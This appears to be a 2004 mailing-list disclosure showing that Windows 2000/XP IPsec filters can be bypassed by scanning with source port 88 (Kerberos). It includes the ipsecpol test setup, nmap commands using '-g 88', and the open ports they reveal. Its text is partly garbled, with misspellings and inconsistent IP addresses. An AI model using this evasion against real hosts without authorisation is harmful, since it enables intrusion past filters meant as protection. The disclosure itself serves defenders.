IPsec Filters Used by Windows 2000 & XP
Hi folks, As a result of a recent Windows host hardening engagement looking at, I cameacross this little trick and thought it might be useful at some point. The Microsoft IPSEC filters used by Windows 2000 & XP can be bypassed by choosing a source port of 88 (Kerberos).
First off, Microsoft themselves state that IPSEC filters are not designed as a full featured host based firewall [1] and it is already known that certain types of traffic are exempt from IPSEC filters [2] and they can be summarised as:
* Broadcast * Multicast * RSVP * IKE * Kerberos
In a Microsoft Support Note [2] there is the line: "The Kerberos Exemption IS Basically this: if a packet is tcp or udp and has source or destination port = 88, permit."
The Test Host Here Has A "Block All" Rule Created use:
ipsecpol.exe -x -w reg -p "the black knight" -r "noneshallpass" -n block -f0 = * :: *
Normal NMAP Scan:
# nmap -ss -v -v -p0 --initial_rtt_timeout 10 --MAX_RTT_TIMEOUT 20 172.25.0.14
Starting NMAP 3.50 (http://www.insecure.org/nmap/) AT 2004-05-19 18:14 Bst Host 172.05.0.14 Appers to be Up ... Good. Initiarating Syn Stealth Scan Against 172.25.0.14 AT 18 : 14 The Syn Stealth Scan Took 7 Seconds To Scan 1659 Ports. INTERESTING PORTS ON 172.25.0.14: (The 1658 Ports Scanned But Not Shown Below Are In State: Filtered) Port State Service88 / TCP CLOSED KERBEROS-SEC
Nmap Run Completed - 1 IP Address (1 Host Up) Scanned in 7.017 Seconds
Port 88 Closed Is The Hint, NMAP Again Using this Source Port:
# nmap -ss -v -v -p0 -g 88 --initial_rtt_timeout 10 --MAX_RTT_TIMEOUT 20 172.25.0.14
Starting NMAP 3.50 (http://www.insecure.org/nmap/) AT 2004-05-19 18:14 Bst Host 172.05.0.14 Appers to be Up ... Good. Initiarating Syn Stealth Scan Against 172.25.0.14 AT 18 .. Interesting ports on 172.25.0.14: (The 1653 ports scanned but not shown below are in state: closed) PORT STATE SERVICE135 / tcp open msrpc139 / tcp open netbios-ssn445 / tcp open microsoft-ds1025 / tcp open NFS-or-IIS1027 / TCP Open IIS1433 / TCP OPEN MS-SQL-SNMAP Run Completed - 1 IP Address (1 Host Up) Scanned in 0.367 Seconds
As can be seen, the IPSEC filters are bypassed. Although not designed as ahost based firewall, IPSEC filters are being used as such, particularly to blockpopular attacked ports such as NETBIOS, CIFS and SQL, perhaps as [temporary] worm mitigation.
In Windows 2003 All of these Default Exemptions Have Been Removed with The Exception of Ike [1] and I Believe That this May BE Incorporated INTO Earlier WindowsVersions At some point.
Cheers, JJ
[1] http://support.microsoft.com/default.aspx?scid=kb;n-us; 810207[2] http://support.microsoft.com/default.aspx?cid=kb;n-us ; 253169